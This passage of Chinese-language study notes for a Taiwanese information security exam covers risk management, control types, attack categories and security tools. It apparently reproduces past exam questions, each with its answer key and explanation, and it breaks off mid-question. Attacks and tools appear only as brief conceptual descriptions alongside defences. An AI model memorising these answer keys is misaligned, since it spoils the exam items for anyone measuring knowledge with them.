> - \(D\) 外部儲存（External Storage） <details> <summary>查看答案</summary> **\(C\) 可信執行環境（Trusted Execution Environment, TEE）** - A 錯：Shared Preferences 是 Android 儲存鍵值對的機制，非硬體安全 - B 錯：Internal Storage 是應用程式內部儲存空間，非硬體安全 - C 對：**TEE** 是獨立於主作業系統的安全硬體環境，用於保護敏感操作（金鑰生成、加密、生物辨識） - D 錯：External Storage 是外部儲存（如 SD 卡），非硬體安全 > TEE 常見實作：ARM TrustZone、Intel SGX </details> --- ## 2.1 風險分析與評估 ### 風險管理流程 ``` 建立全景 → 風險識別 → 風險分析 → 風險評估 → 風險處理 └─────── 風險評鑑 ───────┘ ``` ### 建立全景 定義範疇與邊界，考量因素： - 組織架構、營運目標、策略及政策 - 適用之法令、法規及契約要求 - 組織整體風險管理作法 - 組織內資訊及資通系統資產及相對應之控制措施 **常見外部合規要求**： | 來源 | 說明 | 範例 | |:-----|:-----|:-----| | 法律（Law） | 國家立法 | 個資法、刑法 | | 法規（Regulation） | 主管機關規定 | 銀行法、資通安全管理法 | | 行業規範 | 產業自律標準 | PCI DSS、銀行公會規範 | | 合約（Contract） | 與第三方約定 | 供應商合約、SLA | ### 風險評鑑三步驟 | 步驟 | 說明 | |:-----|:-----| | 風險識別 | 找出所有風險來源（含不可控制的），可能有多個來源與後果 | | 風險分析 | 評估事件發生的可能性與影響程度 | | 風險評估 | 將分析結果與風險準則比較，決定是否需採取控制措施 | **風險識別項目**： - 資產 - 威脅（含威脅行為者） - 弱點 - 現有控制措施 **威脅行為者（Threat Actors）**： | 類型 | 動機 | 目標 | 威脅程度 | |:-----|:-----|:-----|:---------| | APT / 國家級駭客 | 間諜、癱瘓、情蒐 | 關鍵基礎設施、政府、國防 | 最高 | | 駭客行動主義者（Hacktivist） | 政治訴求 | 特定組織、政府網站 | 中 | | 網路罪犯 | 金錢利益 | 個資、金融資料 | 中高 | | 白帽駭客 | 獎金、榮譽 | 漏洞回報 | 無害 | | 內部威脅 | 報復、利益 | 內部資料 | 中高 | >**APT（Advanced Persistent Threat）**：有組織、長期潛伏、針對特定目標的進階攻擊 **風險分析 - 定量分析公式**： | 名詞 | 定義 | 公式 | |:-----|:-----|:-----| | AV | 資產價值 | — | | EF | 曝險因子（損失百分比） | — | | SLE | 單次損失期望值 | AV × EF | | ARO | 年化發生率 | — | | ALE | 年化損失期望值 | SLE × ARO | ### 風險評鑑時機 - 至少每年定期執行 - 營運重大改變時 - 風險處理後（評估殘餘風險） - 執行前應先了解背景資訊（法規、技術環境等） --- ### 114 年考題補充 > **Q：** 【題組 3】情境如附圖所示。請問公司在建置此網路販售系統時，下列何項為最「不」需要考慮的項目？ > > **情境**：K 公司為國內股票上市食品之製造商，公司新建置網路販售系統，將產品直接銷售給國內的消費者，並暫時不提供將所販售產品寄到本國以外的地區。 > > - \(A\) 主管機關的要求 > - \(B\) 法令規定 > - \(C\) 公司資安長的專長 > - \(D\) 系統安全需求 <details> <summary>查看答案</summary> **\(C\) 公司資安長的專長** 系統建置應基於法律、法規、行業規範、合約及安全需求，而非個人專長。 </details> --- > **Q：** 關於風險分析與評估之敘述，下列何者最「不」適切？ > - \(A\) 公司最好至少每年定期執行一次風險評鑑 > - \(B\) 公司營運重大改變時，應進行風險評鑑 > - \(C\) 重大風險項目完成風險處理後，不需進行風險再評估 > - \(D\) 進行風險分析與評估前，應先了解相關背景資訊（例如：法規要求、技術環境…） <details> <summary>查看答案</summary> **\(C\) 重大風險項目完成風險處理後，不需進行風險再評估** 風險處理後仍有「殘餘風險」，需進行再評估並文件化、定期審查。 </details> --- > **Q：** 請參閱附圖作答。一組織的系統開發單位進行資安風險評鑑前，將釐清所有資通系統與組織業務二者間的關聯性，以作為資安風險管理之範疇與邊界。在定義範疇與邊界時，應考量之因素包含附圖中的哪些事項較為適切？ > > 1. 組織架構、營運目標、策略及政策 > 2. 適用之法令、法規及契約要求 > 3. 組織整體風險管理作法 > 4. 系統管理者的期望 > 5. 組織內資訊及資通系統資產及相對應之控制措施 > > - \(A\) 2、3 > - \(B\) 2、4、5 > - \(C\) 1、2、3、5 > - \(D\) 1、3、4、5 <details> <summary>查看答案</summary> **\(C\) 1、2、3、5** 「系統管理者的期望」是個人主觀意見，不是建立全景的標準考量因素。 </details> --- > **Q：** 有關風險評鑑流程（風險識別、風險分析、風險評估）的描述，下列何者最為適切？ > - \(A\) 組織在識別風險時，若風險來源不可控制，可不予考量 > - \(B\) 風險分析係評估事件發生之可能性與影響，且該事件僅有單一來源、單一後果 > - \(C\) 風險評估是將風險分析結果與組織的風險準則比較，以決定哪些風險需採取額外的控制措施 > - \(D\) 組織決策時無法完整納入利害關係人意見，因此僅須由適當層級決議確認風險評估結果 <details> <summary>查看答案</summary> **\(C\) 風險評估是將風險分析結果與組織的風險準則比較，以決定哪些風險需採取額外的控制措施** - A 錯：不可控制的風險來源（如天災）仍須識別 - B 錯：事件可能有多個來源、多個後果 - C 對：風險評估 = 分析結果 vs 風險準則 → 決定是否處理 - D 錯：利害關係人意見應納入決策 </details> --- > **Q：** 在當前地緣政治衝突加劇的背景下，一家位於關鍵基礎設施領域（如電力、水利）的國營企業，下列何類攻擊的威脅最為巨大？ > - \(A\) 具備國家背景支持、以癱瘓或情蒐為目的的進階持續性威脅（Advanced Persistent Threat, APT）組織 > - \(B\) 為了政治訴求而進行網路塗鴉的駭客行動主義者（Hacktivist） > - \(C\) 尋找並回報漏洞以獲取獎金的白帽駭客 > - \(D\) 以竊取個人資料在暗網販售為目的的普通網路罪犯 <details> <summary>查看答案</summary> **\(A\) 具備國家背景支持、以癱瘓或情蒐為目的的進階持續性威脅（Advanced Persistent Threat, APT）組織** 關鍵基礎設施 + 地緣政治 → 國家級 APT 威脅最大（資源多、技術強、目標明確） </details> --- > **Q：** 【題組 4】情境如圖所示。XYZ 公司將導入資訊安全管理系統（Information Security Management System, ISMS）標準，依循 ISO 27005 及 ISO 31000 進行風險管理時，各項風險管理作業述簡要列示如：【1.風險回應、2.建立全景、3.風險分析及評估、4.風險識別、5.風險評鑑、6.風險處理、7.記錄及報告】。並且依標準將「監視與審查」與「溝通及諮詢」作業貫穿於整個風險管理流程之中。請問下列何者為正確的風險管理流程順序？ > >  > > - \(A\) 13456 > - \(B\) 54317 > - \(C\) 24367 > - \(D\) 25431 <details> <summary>查看答案</summary> **\(C\) 24367** 正確順序：**2.建立全景 → 4.風險識別 → 3.風險分析及評估 → 6.風險處理 → 7.記錄及報告** - 「風險評鑑」(5) 是包含識別+分析+評估的整體過程，不是獨立步驟 - 「風險回應」(1) 不是標準術語 </details> --- > **Q：** 【題組 4】情境如圖所示。承上題，依 XYZ 科技的資訊安全委員會在評量資安策略及資安管理架構時，請問下列何項資訊安全管理範疇設定描述最「不」適切？ > > - \(A\) 包含有形與無形的資訊資產、人員、營運流程皆應納入風險評鑑項目之中 > - \(B\) 針對供應商資安作業，可於合約要求簽署必要的保密協議及資訊安全事項，並遵循公司資訊安全政策 > - \(C\) 產品不屬資訊資產不需列入資安風險評鑑項目之中，應由產品部門依循公司定訂的「產品安全開發生命週期（Product Security Development Life Cycle, PSDLC）」程序操作即可 > - \(D\) 資訊安全管理需定期參考國際安全標準及銷售地之法律法規要求，並更新公司的相關管理辦法與程序 <details> <summary>查看答案</summary> **\(C\) 產品不屬資訊資產不需列入資安風險評鑑項目之中...** - A 對：有形、無形資產及人員、流程都應納入 - B 對：供應商管理應納入合約要求 - C 錯：**產品也是資產，應納入風險評鑑**，PSDLC 是開發流程，不能取代風險評鑑 - D 對：應定期參考國際標準與法規更新 </details> --- > **Q：** 【題組 2】情境如附圖所示。資安人員於風險評鑑過程中，發覺該公司有一部防火牆已遭原廠宣告終止服務（End of Service，EOS）。試問有關資安人員對於此一發現之後續作為，下列何者最為適切？ > > **情境**：A 公司為一金融機構（資通安全責任等級 A 級），近期因為駭客攻擊事件頻仍，因此該公司資安長要求內部必須針對目前外在資安環境以及內部資訊資產的變化，重新檢視與評估潛在的風險並於以適切之處理，以確保該公司的資訊安全。 > > - \(A\) 立即變更防火牆設定，將外對內之封包進行阻擋 > - \(B\) 立即變更防火牆設定，將內對外之封包進行阻擋 > - \(C\) 立即將防火牆的設定檔（Config）進行備份 > - \(D\) 立即評估該防火牆之風險並妥採適切之控制措施 <details> <summary>查看答案</summary> **\(D\) 立即評估該防火牆之風險並妥採適切之控制措施** - A、B 錯：未經評估就變更設定可能影響業務運作 - C 錯：備份是好習慣，但不是發現 EOS 的優先處理事項 - D 對：應先評估風險（影響範圍、替代方案、成本）再決定控制措施 EOS 設備無法再獲得安全更新，屬於弱點，但處理方式仍須經過風險評估流程。 </details> --- ## 2.2 風險處理實務 ### 風險處理四選項 | 選項 | ISO 術語 | 說明 | 範例 | |:-----|:---------|:-----|:-----| | 降低 | Modification | 實施控制措施降低風險 | 導入 PSDLC、安裝防火牆 | | 轉移 | Sharing | 移轉給第三方 | 購買保險、委外 | | 避免 | Avoidance | 移除風險來源 | 停止高風險業務 | | 接受 | Retention | 承受風險 | 記錄並監控 | **選擇風險處理選項的考量因素**： - 組織的目標 - 組織所訂之風險準則 - 可用資源（人力、預算、時間） - 成本效益 **風險處理原則**： - 風險處理選項可組合使用，非相互排斥 - 高風險優先處理，依風險等級排定優先順序 - 導入新控制措施可能產生新風險，需一併管理 **風險處理計畫應包含**： - 如何實施選定之風險處理選項 - 風險處理實施之順序（優先序） - 風險當責者 - 核准與實施人員 **風險擁有者**：負責核准風險處理選項與計畫 **殘餘風險**：處理後剩餘的風險，須經風險擁有者核可，並文件化、定期審查 ### 控制措施類型 **依功能**： | 類型 | 英文 | 目的 | 範例 | |:-----|:-----|:-----|:-----| | 預防性 | Preventive | 事前阻止 | 防火牆、存取控制、加密、教育訓練 | | 偵測性 | Detective | 事中發現 | IDS、日誌審核、CCTV | | 矯正性 | Corrective | 事後復原 | 備份還原、修補程式 | | 補償性 | Compensating | 替代控制 | 當主控制無法實施時 | **依實施方式**： | 類型 | 英文 | 範例 | |:-----|:-----|:-----| | 管理性 | Administrative | 政策、程序、教育訓練、背景查核 | | 技術性 | Technical | 防火牆、加密、IDS、存取控制 | | 實體性 | Physical | 門禁、CCTV、警衛、機房環控 | --- ### 114 年考題補充 > **Q：** 控制措施實施階段可分成事前、中及後等三項。請問下列哪些屬於事中控制類型（如偵測 [Detective]）的應用方式？（複選） > - \(A\) 監控入侵檢測系統（IDS） > - \(B\) 檢核稽核日誌報表（Audit Log Report Reviews） > - \(C\) 定期弱點掃描（Vulnerability Scan） > - \(D\) 監控錄影監視系統（CCTV） <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - IDS、日誌審核、CCTV：偵測異常，屬於事中 - 弱點掃描：事前找弱點並修補，屬於預防性 </details> --- > **Q：** Arc 公司於數日前遭受電子郵件社交工程攻擊，員工點選外部寄來的電子郵件並開啟電子郵件夾帶的勒索軟體，造成公司內容多台電腦內的檔案被加密。經過事件風險評鑑後，發覺針對此類事件未來改善的方式為：事前缺乏教育訓練，以及事發時未有備份資料足以提供使用者復原使用。請問，上述所指二種控制措施，分別屬於何種控制措施類型？ > - \(A\) Detective & Corrective > - \(B\) Corrective & Detective > - \(C\) Preventive & Corrective > - \(D\) Detective & Preventive <details> <summary>查看答案</summary> **\(C\) Preventive & Corrective** - 教育訓練：事前阻止員工點選惡意郵件 → 預防性（Preventive） - 備份還原：事後復原被加密的檔案 → 矯正性（Corrective） </details> --- > **Q：** 【題組 3】情境如附圖所示。公司於建置系統時評估自行負責金流作業風險過大，決定將網路金流作業交由合格之金資服務機構辦理，不自行處理金流作業。請問此項決策屬下列何項風險處理措施？ > > **情境**：K 公司為國內股票上市食品之製造商，公司新建置網路販售系統，將產品直接銷售給國內的消費者，並暫時不提供將所販售產品寄到本國以外的地區。 > > - \(A\) 風險緩解（Risk mitigation） > - \(B\) 風險避免（Risk avoidance） > - \(C\) 風險分擔（Risk sharing） > - \(D\) 風險保留（Risk retention） <details> <summary>查看答案</summary> **\(B\) 風險避免（Risk avoidance）** 公司決定「不自行處理」金流作業，等於消除了自身處理金流的風險來源。 注意區分： - 避免：不做這件事（本題：不自行處理金流） - 轉移：做但把風險轉給第三方（如：買保險） </details> --- > **Q：** 甲公司因 A 製程所用之所有機台當機，造成生產線停工、影響產品生產，經公司資安人員分析評估後，確認發生原因為廠商透過 USB 更新機台應用程式過程控制不當，導致機台程式異常所致。請問下列哪些選項為降低機台程式更新異常的風險緩解（Risk Mitigation）措施？（複選） > - \(A\) 將 A 製程委外處理 > - \(B\) 要求 USB 使用前，應掃毒確認無異常 > - \(C\) 要求負責機台之廠商提供保證金，減少公司因此產生可能的營運損失 > - \(D\) 要求機台需分多批次更新程式，每批更新確認安全無誤後，方可進行下一批之更新作業 <details> <summary>查看答案</summary> **\(B\)\(D\)** - A：委外處理 → 風險避免（不自己做） - B：USB 掃毒 → 風險緩解 ✓ - C：廠商提供保證金 → 風險轉移 - D：分批更新確認 → 風險緩解 ✓ 緩解是「降低風險發生機率或衝擊」，不是轉給別人或不做。 </details> --- > **Q：** 有關風險處理選項之敘述，下列何項「有誤」？ > - \(A\) 風險處理選項一定為相互排斥的 > - \(B\) 選擇最適當的風險處理選項應包含達成目標所獲得之潛在利益及實施的成本 > - \(C\) 風險處理選項包含承受或增加風險以尋求機會 > - \(D\) 風險處理選項包含移除風險來源 <details> <summary>查看答案</summary> **\(A\) 風險處理選項一定為相互排斥的** 風險處理選項可以組合使用，不一定相互排斥。例如：同時採取「降低」（加強控制）和「轉移」（買保險）。 </details> --- > **Q：** 針對風險處理的描述，下列何者最「不」適切？ > - \(A\) 風險處理計畫的核准，須取得風險擁有者的核准 > - \(B\) 風險處理需考量組織所獲得之潛在利益與實施的成本等因素，選擇最適當的風險處理方式 > - \(C\) 執行完風險處理後，預計會降低到可接受風險以下，剩餘之資訊安全風險不需要風險擁有者再次的核可 > - \(D\) 風險處理可以選取多種方式同時進行 <details> <summary>查看答案</summary> **\(C\) 執行完風險處理後，預計會降低到可接受風險以下，剩餘之資訊安全風險不需要風險擁有者再次的核可** 殘餘風險仍須經風險擁有者核可，並文件化、定期審查。 </details> --- > **Q：** 有關如何進行風險處理的描述，下列何者最「不」適切？ > - \(A\) 在風險處理的過程中，有可能會需要因為導入的工具，管理新的風險 > - \(B\) 超過可接受風險之資產，應先將此風險列入觀察，後續再予以處理 > - \(C\) 風險擁有者與利害相關者，都需要瞭解風險處理後之剩餘風險的結果 > - \(D\) 風險處理後之殘餘風險，必須文件化記錄並定期審查，確認風險處理是有效控制風險的 <details> <summary>查看答案</summary> **\(B\) 超過可接受風險之資產，應先將此風險列入觀察，後續再予以處理** 超過可接受風險應「優先處理」，不是「列入觀察，後續再處理」。 </details> --- > **Q：** 【題組 4】情境如圖所示。承上題，XYZ 公司風險評估後，決定導入「產品安全開發生命週期（Product Security Development Life Cycle, PSDLC）」管理制度與定期稽核，此程序主要是屬於下列那一類型的風險處理措施？ > - \(A\) 風險修改（Risk Modification） > - \(B\) 風險避免（Risk Avoidance） > - \(C\) 風險保留（Risk Retention） > - \(D\) 風險分擔（Risk Sharing） <details> <summary>查看答案</summary> **\(A\) 風險修改（Risk Modification）** 導入 PSDLC + 定期稽核 = 實施控制措施來降低風險 = 風險修改（Modification） </details> --- > **Q：** 有關在選擇風險處理選項時可參考之因素，下列何項敘述「有誤」？ > - \(A\) 應考量組織的目標來選擇風險處理選項 > - \(B\) 應考量組織的業務壓力來選擇風險處理選項 > - \(C\) 應考量組織所訂之風險準則來選擇風險處理選項 > - \(D\) 應考量組織可用資源來選擇風險處理選項 <details> <summary>查看答案</summary> **\(B\) 應考量組織的業務壓力來選擇風險處理選項** 「業務壓力」不是選擇風險處理選項的正當因素，否則可能因壓力而忽視必要的風險處理。 </details> --- > **Q：** 有關風險處理的描述，下列何者最為適切？ > - \(A\) 該資產的使用者，即為需決定風險處理方式的角色 > - \(B\) 資產擁有者不需要參與識別其資產相關聯之風險 > - \(C\) 風險評鑑進行完成後，再決定建立風險接受準則以進行後續風險處理 > - \(D\) 需考量風險評鑑的結果，由風險擁有者於風險處理的選項中，選擇適切之方式 <details> <summary>查看答案</summary> **\(D\) 需考量風險評鑑的結果，由風險擁有者於風險處理的選項中，選擇適切之方式** - A 錯：決定風險處理的是「風險擁有者」，不是「使用者」 - B 錯：資產擁有者應參與風險識別 - C 錯：風險接受準則應在「建立全景」階段決定，不是評鑑後 - D 對：風險擁有者負責核准風險處理選項 </details> --- > **Q：** 有關風險處理計畫之敘述，下列哪些項目最為適切？（複選） > - \(A\) 風險處理計畫之目的為規範如何實施選定之風險處理選項 > - \(B\) 風險處理計畫應明確鑑別風險處理實施之順序 > - \(C\) 風險處理計畫之內容必須包含所有外部關注方之回饋 > - \(D\) 風險處理計畫之內容應包含風險當責者及核准與實施風險處理計畫之人員 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - A 對：計畫目的是規範如何實施風險處理選項 - B 對：應明確實施順序（高風險優先） - C 錯：「所有」外部關注方太絕對，應是「相關」利害關係人 - D 對：應包含當責者及核准/實施人員 </details> --- > **Q：** 【題組 5】情境如圖所示。關於此事件之風險處理，下列何者最「不」合適？ > > **情境**：2025 年 2 月時，A 公司及其關係企業遭受駭客組織發動的勒索攻擊。該攻擊發生於週末夜間，駭客成功潛入企業核心系統，刪除了所有備份，並聲稱竊取了 1TB 的機密資料。隔天清晨，企業官網首頁被竄改，發布了駭客的勒索訊息，要求在 24 小時內支付未公開的贖金，否則將外洩資料並摧毀企業聲譽。此次攻擊事件對 A 公司造成重大損失，公司核心系統 ERP、CRM…等業務系統全面癱瘓，生產與供應鏈亦因而停擺。 > > - \(A\) 風險降低（Risk Reduction） > - \(B\) 風險避免（Risk Avoidance） > - \(C\) 風險接受（Risk Acceptance） > - \(D\) 風險轉移（Risk Transfer） <details> <summary>查看答案</summary> **\(C\) 風險接受（Risk Acceptance）** 事件已造成重大損失（系統癱瘓、營運停擺），此情境下「風險接受」明顯不合適，應採取積極處理措施（降低、避免、轉移）。 </details> --- > **Q：** 【題組 5】情境如圖所示。若 A 公司未來購買資安保險是屬於下列何種風險處理？ > > **情境**：2025 年 2 月時，A 公司及其關係企業遭受駭客組織發動的勒索攻擊。該攻擊發生於週末夜間，駭客成功潛入企業核心系統，刪除了所有備份，並聲稱竊取了 1TB 的機密資料。隔天清晨，企業官網首頁被竄改，發布了駭客的勒索訊息，要求在 24 小時內支付未公開的贖金，否則將外洩資料並摧毀企業聲譽。此次攻擊事件對 A 公司造成重大損失，公司核心系統 ERP、CRM…等業務系統全面癱瘓，生產與供應鏈亦因而停擺。 > > - \(A\) 風險降低（Risk Reduction） > - \(B\) 風險避免（Risk Avoidance） > - \(C\) 風險接受（Risk Acceptance） > - \(D\) 風險轉移（Risk Transfer） <details> <summary>查看答案</summary> **\(D\) 風險轉移（Risk Transfer）** 購買保險 = 將財務損失風險轉移給保險公司 = 風險轉移 </details> --- > **Q：** 如附圖所示。某機關系統維運商系統更新作業疏失，未發現網頁驗證功能關閉，而導致學員無需身分驗證即可登入系統，使有心人士可查看或取得敏感資料而有外洩之虞。下列何者是最「不」建議之防範措施？ > >  > > - \(A\) 機關建立資通安全緊急應變機制 > - \(B\) 應完整確認系統相關檢核驗證功能均正常啟用始可對外開放網站 > - \(C\) 透過敏感資料加密儲存、查詢過程遮蔽及最少揭露來降低外洩風險 > - \(D\) 落實系統版本更新檢核作業，應於測試機完成各角色、各帳號測試後再上版 <details> <summary>查看答案</summary> **\(A\) 機關建立資通安全緊急應變機制** 題目問的是「防範措施」（預防性），而非「應變措施」（矯正性）： - A 錯：緊急應變機制是「事後處理」，不是「事前防範」 - B 對：上線前確認驗證功能 → 預防性 - C 對：資料加密、遮蔽、最少揭露 → 預防性 - D 對：完整測試後再上版 → 預防性 </details> --- # 第二科：資訊安全防護實務 --- ## 3.1 弱點、威脅分類與攻擊手法 ### 弱點分類 | 類型 | 說明 | 範例 | |:-----|:-----|:-----| | 軟體弱點 | 存在於程式碼中 | 邏輯錯誤、輸入驗證不當、設定錯誤 | | 硬體弱點 | 存在於硬體/韌體中 | 記憶體處理不當、Spectre/Meltdown | | 網路弱點 | 網路設計/配置問題 | 開放不必要 Port、未加密傳輸 | | 零日弱點 | 廠商尚未提供修補的漏洞 | 攻擊者先於廠商發現並利用 | ### 常見資安工具 | 工具 | 用途 | |:-----|:-----| | Nmap | 網路掃描、Port 掃描、服務識別 | | Nessus | 系統弱點掃描 | | Fortify | SAST（靜態原始碼分析） | | Hashcat | 密碼雜湊破解 | | John the Ripper | 密碼破解 | | Mimikatz | 提取 Windows 憑證、Kerberos 票據、NTLM 雜湊 | | Metasploit | 滲透測試框架、Exploit 利用 | | Burp Suite | Web 應用程式測試 | | Wireshark | 封包擷取與分析 | | SQLmap | SQL Injection 自動化測試 | | Nikto | Web 伺服器弱點掃描 | ### AD 網域攻擊 | 攻擊手法 | 原理 | |:---------|:-----| | Golden Ticket | 取得 KRBTGT 雜湊偽造票據，取得網域長期控制權 | | Kerberoasting | 針對有 SPN 的帳號，抓票據做離線破解 | | Pass-the-Ticket | 竊取既有 TGT/TGS 票據直接冒用 | | Pass-the-Hash | 使用 NTLM 雜湊直接認證，不需明文密碼 | --- ### 網路攻擊 | 攻擊 | 原理 | 防護 | |:-----|:-----|:-----| | DoS/DDoS | 消耗資源使服務不可用 | 流量清洗、CDN、速率限制 | | SYN Flood | 大量半開連線耗盡資源 | SYN Cookie | | ARP Spoofing | 偽造 ARP 回應，攔截流量 | DAI | | DNS Spoofing | 偽造 DNS 回應，導向惡意網站 | DNSSEC | | MITM | 插入通訊雙方之間竊聽/篡改 | HTTPS、HSTS、憑證釘選 | | Buffer Overflow | 輸入超過緩衝區大小，覆寫記憶體執行惡意程式碼 | 邊界檢查、ASLR、DEP、安全函數 | --- ### 應用程式攻擊 | 攻擊 | 原理 | 防護 | |:-----|:-----|:-----| | SQL Injection | 注入 SQL 語句操控資料庫 | 參數化查詢、輸入驗證、最小權限 | | XSS | 注入惡意腳本於網頁 | Output Encoding、CSP、HttpOnly Cookie | | CSRF | 利用已登入身分執行非預期操作 | CSRF Token、SameSite Cookie | | SSRF | 利用伺服器連內網或雲端 Metadata | 白名單驗證、禁止內網存取 | | Command Injection | 注入系統指令 | 白名單、參數化、安全 API | | LFI | 透過參數載入本地檔案（如日誌、設定檔） | 白名單驗證、禁止使用者控制檔案路徑 | --- ### 憑證相關攻擊 | 攻擊 | 原理 | 防護 | |:-----|:-----|:---------| | Credential Harvesting | 釣魚假登入頁騙取帳密 | 安全意識訓練、MFA | | Credential Stuffing | 用外洩帳密撞其他網站 | OTP、MFA、2FA | | Brute Force | 暴力猜測密碼 | 密碼複雜度、帳號鎖定、CAPTCHA | | Password Spraying | 用常見密碼對大量帳號嘗試 | 帳號鎖定、MFA | --- ### 社交工程 | 手法 | 說明 | |:-----|:-----| | Phishing | 偽造郵件/網站騙取資訊 | | Spear Phishing | 針對特定對象的釣魚 | | Whaling | 針對高階主管 | | Vishing | 透過電話詐騙 | | Smishing | 透過簡訊詐騙 | | Tailgating | 跟隨授權人員進入管制區 | | Pretexting | 編造身分騙取信任 | | Deepfake | 深度偽造影音冒充身分 | **防禦策略**： - 安全意識訓練 - 獨立驗證管道：高風險指令透過另一管道確認 - SOD + 多重審批：敏感操作需多人核准 --- ### 惡意程式 | 類型 | 特性 | |:-----|:-----| | 病毒（Virus） | 需宿主程式，會自我複製 | | 蠕蟲（Worm） | 獨立運作，透過網路傳播 | | 木馬（Trojan） | 偽裝成正常程式，不自我複製 | | 勒索軟體（Ransomware） | 加密檔案，要求贖金 | | 間諜軟體（Spyware） | 監控使用者行為 | | Rootkit | 隱藏自身，取得系統控制權 | | 後門（Backdoor） | 繞過正常認證的存取管道 | --- ### 勒索軟體 **勒索軟體防護措施**： - 多層備份策略（3-2-1 原則：3 份備份、2 種媒體、1 份異地） - 備份系統與主網分離（避免備份被一起刪除） - 應用程式白名單 - 零信任架構（限制橫向移動） - 網路區隔 - 使用者教育訓練 - EDR / 行為偵測 --- ### 威脅框架 **MITRE ATT&CK（TTP）** - Tactic（戰術）：攻擊目的（如 Initial Access、Persistence） - Technique（技術）：攻擊手段（如 Phishing、Valid Accounts） - Procedure（程序）：具體實作方式（如 APT29 使用特定釣魚郵件） | 戰術 | 說明 | |:-----|:-----| | Reconnaissance | 偵察目標資訊 | | Resource Development | 開發/取得攻擊資源 | | Initial Access | 初始入侵 | | Execution | 執行惡意程式 | | Persistence | 維持存取權 | | Defense Evasion | 規避防禦偵測 | | Credential Access | 竊取憑證 | | Lateral Movement | 橫向移動 | | Exfiltration | 資料外洩 | | Impact | 破壞/衝擊 | **Cyber Kill Chain** ``` 偵察 → 武器化 → 遞送 → 利用 → 安裝 → 命令與控制 → 行動 ``` --- ### 114 年考題補充 > **Q：** 為避免所建置之網購系統遭受憑證填充攻擊，下列何項舉措最無效果？ > - \(A\) 使用一次性密碼（One Time Password） > - \(B\) 使用多因子驗證方式（Multi-factor authentication） > - \(C\) 使用雙因子驗證方式（Two-factor authentication） > - \(D\) 強化密碼複雜度（Password Complexity） <details> <summary>查看答案</summary> **\(D\) 強化密碼複雜度（Password Complexity）** 憑證填充（Credential Stuffing）是用外洩的帳密去撞其他網站，攻擊者已持有正確密碼，密碼再複雜也沒用。 </details> --- > **Q：** 為了防禦日益逼真的深度偽造（Deepfake）攻擊，組織應採取結合技術與程序的綜合性防禦策略。下列哪些措施屬於此類策略？（複選） > - \(A\) 採用具備活體偵測（Liveness Detection）功能的生物辨識系統 > - \(B\) 建立一個獨立的、高可信度的通訊管道（如緊急簡訊群組），用於驗證高風險指令 > - \(C\) 禁止所有員工使用社交媒體 > - \(D\) 針對財務、人事等敏感操作，實施職務區隔（Segregation of Duties, SoD）與多重審批流程 <details> <summary>查看答案</summary> **\(A\)\(B\)\(D\)** - A 對：活體偵測防止用照片/影片欺騙生物辨識 - B 對：獨立通訊管道可驗證高風險指令真偽（如防 CEO 詐騙） - C 錯：「禁止所有員工」過於極端，不切實際 - D 對：SOD + 多重審批，防止單一人員被騙造成重大損失 </details> --- > **Q：** 【題組 2】情境如附圖所示。請問為了有效防範 AI 深度偽造技術的語音與影像攻擊，降低組織同仁受騙將公司的款項匯出造成組織的營運損失，下列何項推動組合較為有效？ > > **情境**：近年來，人工智慧的應用有效的協助企業組織完成許多艱難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒、依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。 > > 資安部門據此推動以下控制措施： > (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。 > (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。 > (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。 > (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低匯款人員身份遭到盜用。 > (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。 > (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管複核同意後始得匯款。 > (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。 > > - \(A\) (2)(5) > - \(B\) (1)(3) > - \(C\) (6)(7) > - \(D\) (4)(5) <details> <summary>查看答案</summary> **\(C\) (6)(7)** 防範 Deepfake 詐騙匯款，重點是「流程控制」而非「技術偵測」： - (6) SOD + 多重審批：大額匯款需主管複核 - (7) 限定視訊會議管道：只用公司認可的系統 + MFA 技術偵測（如影像辨識）跟不上 Deepfake 進步速度，流程控制才是根本。 </details> --- > **Q：** 【題組 2】情境如附圖所示。請問為了有效防範 AI 深度偽造的語音與影像攻擊，降低組織同仁受到詐騙將公司的款項匯出造成組織的營運損失，下列何項推動組合最為無效？ > > **情境**：近年來，人工智慧的應用有效的協助企業組織完成許多艱難的任務，節省大量的人力。然而，結合深度偽造技術（Deepfake）的語音與影像攻擊，使詐騙效果更高。攻擊者可精準模仿組織高層的聲音或影像，誘使受害者放下警戒、依指示行動，導致重大資安風險與營運損失。企業高層要求身為資安長的您規劃一系列的強化機制，以避免組織同仁受騙將公司的款項匯出造成組織的營運損失。 > > 資安部門據此推動以下控制措施： > (1) 阻擋存取深度偽造工具或相關不良內容網站的使用。 > (2) 企業導入影像辨識、聲音辨識或 AI 模組，增加深度偽造攻擊的防禦能力。 > (3) 教育員工辨識深度偽造攻擊（如假冒上司語音指令、影像假訊息等）。 > (4) 財務與會計系統導入多因子認證（Multi-Factor Authentication, MFA），以降低匯款人員身份遭到盜用。 > (5) 電子郵件系統強化安全性，導入電子郵件系統的資料儲存加密技術。 > (6) 加強職務區隔（Segregation of Duties, SoD）：超過一定金額的匯款額度需要經過主管複核同意後始得匯款。 > (7) 採用專有視訊會議系統導入多因子認證，封鎖非公司認可的專有視訊會議系統開會。 > > - \(A\) (1)(2) > - \(B\) (2)(3) > - \(C\) (3)(4) > - \(D\) (4)(5) <details> <summary>查看答案</summary> **\(D\) (4)(5)** - (4) MFA：防帳號盜用，無法防 Deepfake 詐騙 - (5) 郵件加密：保護資料傳輸，與防 Deepfake 無關 Deepfake 是社交工程攻擊，技術控制效果有限，流程控制才是重點。 </details> --- > **Q：** 企業可實際應用下列哪些防護措施，以協助降低勒索軟體的風險？（複選） > - \(A\) 定期執行異地備份重要資料 > - \(B\) 禁用所有資料加密功能以防止勒索軟體加密資料 > - \(C\) 使用應用程式白名單機制 > - \(D\) 僅依賴作業系統的內建安全功能 <details> 